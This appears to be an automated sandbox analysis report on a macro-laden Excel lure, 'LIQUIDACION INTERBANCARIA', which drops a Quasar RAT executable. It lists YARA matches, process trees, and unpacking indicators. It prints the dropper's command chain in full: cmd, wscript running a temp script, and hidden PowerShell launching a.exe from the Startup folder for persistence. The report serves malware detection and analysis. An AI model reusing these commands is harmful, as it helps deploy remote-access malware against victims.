                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054121F8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054152E8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_05411928
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0541A710
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0541A6FF
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_054115E0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_0690BFD6
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06907994
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E04F4F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E03F58
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_06E01B88
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BDD250
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DC154
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE589
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 17_2_028DE598
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560740
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_0156579D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_015604C9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 20_2_01560730
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, VBA macros: true
                  Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.csCryptographic APIs: 'CreateDecryptor'
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeMutant created: \Sessions\1\BaseNamedObjects\Kdjaq
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.datJump to behavior
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, Workbook stream: true
                  Source: C:\ProgramData\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\ProgramData\a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\ProgramData\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\ProgramData\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
                  Source: C:\ProgramData\a.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\ProgramData\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\ProgramData\a.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)Show sources
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  .NET source code contains potential unpackerShow sources
                  Source: 1.2.a.exe.410000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.0.a.exe.410000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.a.exe.540000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.a.exe.540000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 12.0.a.exe.270000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 12.2.a.exe.270000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 13.2.a.exe.a90000.1.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 13.0.a.exe.a90000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.2.a.exe.5b0000.0.unpack, Form2.cs.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Suspicious powershell command line foundShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
